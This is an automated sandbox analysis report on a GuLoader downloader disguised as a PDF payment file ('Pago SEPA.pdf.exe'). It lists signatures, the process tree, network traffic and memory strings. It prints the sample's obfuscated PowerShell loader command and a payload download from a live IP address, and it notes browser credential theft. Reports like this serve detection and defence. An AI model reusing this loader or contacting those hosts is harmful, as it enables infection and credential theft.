Windows Analysis Report
Pago SEPA.pdf.exe

Overview

General Information

Sample name: Pago SEPA.pdf.exe
Analysis ID: 1556579
MD5: b09a414939191d7f43c114c02726ddb9
SHA1: 2f9c6fef4c2a1b62e483a2cc70da3fb181b22b82
SHA256: 32c90ef4f976a4da59bc95b23141547372640b04840e496852e80ee03c81b284
Tags: exe, GuLoader, user-abuse_ch

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Early bird code injection technique detected
Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Double Extension File Execution
Yara detected GuLoader
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Initial sample is a PE file and has a suspicious name
Loading BitLocker PowerShell Module
Queues an APC in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Uses an obfuscated file name to hide its real file extension (double extension)
Writes to foreign memory regions
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Msiexec Initiated Connection
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Pago SEPA.pdf.exe (PID: 3792 cmdline: "C:\Users\user\Desktop\Pago SEPA.pdf.exe" MD5: B09A414939191D7F43C114C02726DDB9)
    • powershell.exe (PID: 6508 cmdline: "powershell.exe" -windowstyle minimized "$Alkamine36=Get-Content -Raw 'C:\Users\user\AppData\Local\skydedrene\Nitallernes\sammenlimningers\Multipara168.Sel';$preallocators=$Alkamine36.SubString(1880,3);.$preallocators($Alkamine36)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 3668 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • WmiPrvSE.exe (PID: 2472 cmdline: C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding MD5: 64ACA4F48771A5BA50CD50F2410632AD)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
Source: 00000002.00000002.2604236409.000000000BBDF000.00000040.00001000.00020000.00000000.sdmp
Rule: JoeSecurity_GuLoader_2
Description: Yara detected GuLoader
Author: Joe Security
Strings:

    System Summary

    Source: Process started | Author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\Pago SEPA.pdf.exe", CommandLine: "C:\Users\user\Desktop\Pago SEPA.pdf.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\Pago SEPA.pdf.exe, NewProcessName: C:\Users\user\Desktop\Pago SEPA.pdf.exe, OriginalFileName: C:\Users\user\Desktop\Pago SEPA.pdf.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Users\user\Desktop\Pago SEPA.pdf.exe", ProcessId: 3792, ProcessName: Pago SEPA.pdf.exe
    Source: Network Connection | Author: frack113 | Data: DestinationIp: 104.168.32.140, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 3668, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49928
    Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "powershell.exe" -windowstyle minimized "$Alkamine36=Get-Content -Raw 'C:\Users\user\AppData\Local\skydedrene\Nitallernes\sammenlimningers\Multipara168.Sel';$preallocators=$Alkamine36.SubString(1880,3);.$preallocators($Alkamine36)" , CommandLine: "powershell.exe" -windowstyle minimized "$Alkamine36=Get-Content -Raw 'C:\Users\user\AppData\Local\skydedrene\Nitallernes\sammenlimningers\Multipara168.Sel';$preallocators=$Alkamine36.SubString(1880,3);.$preallocators($Alkamine36)" , CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Pago SEPA.pdf.exe", ParentImage: C:\Users\user\Desktop\Pago SEPA.pdf.exe, ParentProcessId: 3792, ParentProcessName: Pago SEPA.pdf.exe, ProcessCommandLine: "powershell.exe" -windowstyle minimized "$Alkamine36=Get-Content -Raw 'C:\Users\user\AppData\Local\skydedrene\Nitallernes\sammenlimningers\Multipara168.Sel';$preallocators=$Alkamine36.SubString(1880,3);.$preallocators($Alkamine36)" , ProcessId: 6508, ProcessName: powershell.exe
    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
    2024-11-15T17:21:11.502558+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49967 | 162.55.60.2 | 80 | TCP
    2024-11-15T17:21:03.979116+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49928 | 104.168.32.140 | 80 | TCP

    AV Detection

    Source: Pago SEPA.pdf.exe | ReversingLabs: Detection: 47%
    Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.8% probability
    Source: Pago SEPA.pdf.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: Pago SEPA.pdf.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb | source: powershell.exe, 00000002.00000002.2597839099.00000000083AD000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: aqm.Core.pdb | source: powershell.exe, 00000002.00000002.2597839099.00000000083AD000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: CallSite.Targetore.pdb" | source: powershell.exe, 00000002.00000002.2601004631.00000000084D6000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: %]qm.Core.pdb<w> | source: powershell.exe, 00000002.00000002.2597839099.00000000083AD000.00000004.00000020.00020000.00000000.sdmp
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exe | Code function: 0_2_00406362 FindFirstFileW,FindClose,0_2_00406362
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exe | Code function: 0_2_00405810 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405810
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exe | Code function: 0_2_004027FB FindFirstFileW,0_2_004027FB
    Source: Joe Sandbox View | IP Address: 162.55.60.2 162.55.60.2
    Source: unknown | DNS query: name: showip.net
    Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49928 -> 104.168.32.140:80
    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49967 -> 162.55.60.2:80
    Source: global traffic | HTTP traffic detected:
        GET /jUPSCuLd221.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
        Host: 104.168.32.140
        Cache-Control: no-cache
    Source: unknown | TCP traffic detected without corresponding DNS query: 104.168.32.140
    Source: global traffic | HTTP traffic detected:
        GET / HTTP/1.1
        User-Agent: Project1
        Host: showip.net
    Source: global traffic | DNS traffic detected: DNS query: showip.net
    Source: msiexec.exe, 00000006.00000002.3345090343.0000000006C5C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3345062577.0000000006BD0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://104.168.32.140/jUPSCuLd221.bin
    Source: powershell.exe, 00000002.00000002.2593527017.0000000007510000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro
    Source: Pago SEPA.pdf.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: powershell.exe, 00000002.00000002.2591032297.0000000005D15000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000002.00000002.2588514134.0000000004E06000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: msiexec.exe, 00000006.00000003.2754960395.0000000006CDB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2754932824.00000000229F7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://schema.org
    Source: powershell.exe, 00000002.00000002.2588514134.0000000004CB1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: msiexec.exe, 00000006.00000002.3345090343.0000000006C5C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3345090343.0000000006C86000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://showip.net
    Source: msiexec.exe, 00000006.00000002.3345240394.0000000006CBF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3345090343.0000000006C86000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2755040323.0000000006CBB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3345090343.0000000006C1A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://showip.net/
    Source: msiexec.exe, 00000006.00000002.3345090343.0000000006C1A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://showip.net/W
    Source: msiexec.exe, 00000006.00000002.3345090343.0000000006C1A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://showip.net/g
    Source: msiexec.exe, 00000006.00000002.3345090343.0000000006C5C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://showip.netll
    Source: powershell.exe, 00000002.00000002.2588514134.0000000004E06000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: msiexec.exe, 00000006.00000003.2754932824.00000000229F7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.maxmind.com
    Source: powershell.exe, 00000002.00000002.2597839099.00000000083AD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.-h
    Source: powershell.exe, 00000002.00000002.2597839099.00000000083AD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.c
    Source: msiexec.exe, 00000006.00000003.2741130608.0000000006CAF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
    Source: powershell.exe, 00000002.00000002.2588514134.0000000004CB1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
    Source: msiexec.exe, 00000006.00000003.2741130608.0000000006CAF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
    Source: msiexec.exe, 00000006.00000003.2741130608.0000000006CAF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
    Source: msiexec.exe, 00000006.00000003.2741130608.0000000006CAF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
    Source: powershell.exe, 00000002.00000002.2591032297.0000000005D15000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000002.00000002.2591032297.0000000005D15000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000002.00000002.2591032297.0000000005D15000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
    Source: msiexec.exe, 00000006.00000003.2741130608.0000000006CAF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
    Source: msiexec.exe, 00000006.00000003.2741130608.0000000006CAF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
    Source: msiexec.exe, 00000006.00000003.2741130608.0000000006CAF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
    Source: msiexec.exe, 00000006.00000002.3345090343.0000000006C1A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fundingchoicesmessages.google.com/i/pub-8790158038613050?ers=1
    Source: powershell.exe, 00000002.00000002.2588514134.0000000004E06000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 00000002.00000002.2597839099.0000000008380000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://go.microsoftB
    Source: powershell.exe, 00000002.00000002.2597839099.0000000008380000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://go.microsoftBranchCache.psd1as
    Source: powershell.exe, 00000002.00000002.2591032297.0000000005D15000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
    Source: msiexec.exe, 00000006.00000003.2754960395.0000000006CDB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2754932824.00000000229F7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://showip.net/
    Source: msiexec.exe, 00000006.00000003.2754960395.0000000006CDB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2754932824.00000000229F7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://showip.net/?checkip=
    Source: msiexec.exe, 00000006.00000003.2754932824.00000000229F7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://unpkg.com/leaflet
    Source: msiexec.exe, 00000006.00000003.2741130608.0000000006CAF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
    Source: msiexec.exe, 00000006.00000003.2741130608.0000000006CAF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
    Source: msiexec.exe, 00000006.00000002.3355904503.00000000229E6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3345240394.0000000006CBF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2755001524.00000000229E1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2755040323.0000000006CBB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-L6NKT5G6D7
    Source: msiexec.exe, 00000006.00000003.2754960395.0000000006CDB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2754932824.00000000229F7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.openstreetmap.org/copyright
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exe | Code function: 0_2_004052BD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004052BD

    System Summary

    Source: initial sample | Static PE information: Filename: Pago SEPA.pdf.exe
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exe | Code function: 0_2_0040326A EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,CoUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040326A
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exe | Code function: 0_2_004066E3 0_2_004066E3
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exe | Code function: 0_2_00404AFA 0_2_00404AFA
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0484DE58 2_2_0484DE58
    Source: Pago SEPA.pdf.exe, 00000000.00000000.2082635852.0000000000449000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilename euripidean.exe4 vs Pago SEPA.pdf.exe
    Source: Pago SEPA.pdf.exe | Binary or memory string: OriginalFilename euripidean.exe4 vs Pago SEPA.pdf.exe
    Source: Pago SEPA.pdf.exe, 00000000.00000003.2086726553.000000000284C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2591032297.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, Multipara168.Sel.0.dr | Binary or memory string:
    Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/13@1/2
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exe | Code function: 0_2_0040457E GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_0040457E
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exe | Code function: 0_2_00402095 CoCreateInstance,0_2_00402095
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exe | File created: C:\Users\user\AppData\Local\skydedrene
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6648:120:WilError_03
    Source: C:\Windows\SysWOW64\msiexec.exe | Mutant created: NULL
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exe | File created: C:\Users\user\AppData\Local\Temp\nsnCBD.tmp
    Source: Pago SEPA.pdf.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exe | File read: C:\Users\desktop.ini
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: msiexec.exe, 00000006.00000003.2741970159.0000000006CBD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2741683831.0000000006C9D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2741434912.0000000006CBE000.00000004.00000020.00020000.00000000.sdmp, LogsootlessWXcJvVxgqogbJMtTgixrfxDDShIZGnaTWneuqdEfishspear.6.dr | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exe | File read: C:\Users\user\Desktop\Pago SEPA.pdf.exe
    Source: unknown | Process created: C:\Users\user\Desktop\Pago SEPA.pdf.exe "C:\Users\user\Desktop\Pago SEPA.pdf.exe"
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Alkamine36=Get-Content -Raw 'C:\Users\user\AppData\Local\skydedrene\Nitallernes\sammenlimningers\Multipara168.Sel';$preallocators=$Alkamine36.SubString(1880,3);.$preallocators($Alkamine36)"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exe | Section loaded: uxtheme.dll
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exe | Section loaded: userenv.dll
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exe | Section loaded: version.dll
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exe | Section loaded: shfolder.dll
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exe | Section loaded: kernel.appcore.dll
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exe | Section loaded: windows.storage.dll
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exe | Section loaded: wldp.dll
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exe | Section loaded: propsys.dll
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exe | Section loaded: riched20.dll
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exe | Section loaded: usp10.dll
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exe | Section loaded: msls31.dll
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exe | Section loaded: textinputframework.dll
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exe | Section loaded: coreuicomponents.dll
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exe | Section loaded: coremessaging.dll
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exe | Section loaded: ntmarta.dll
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
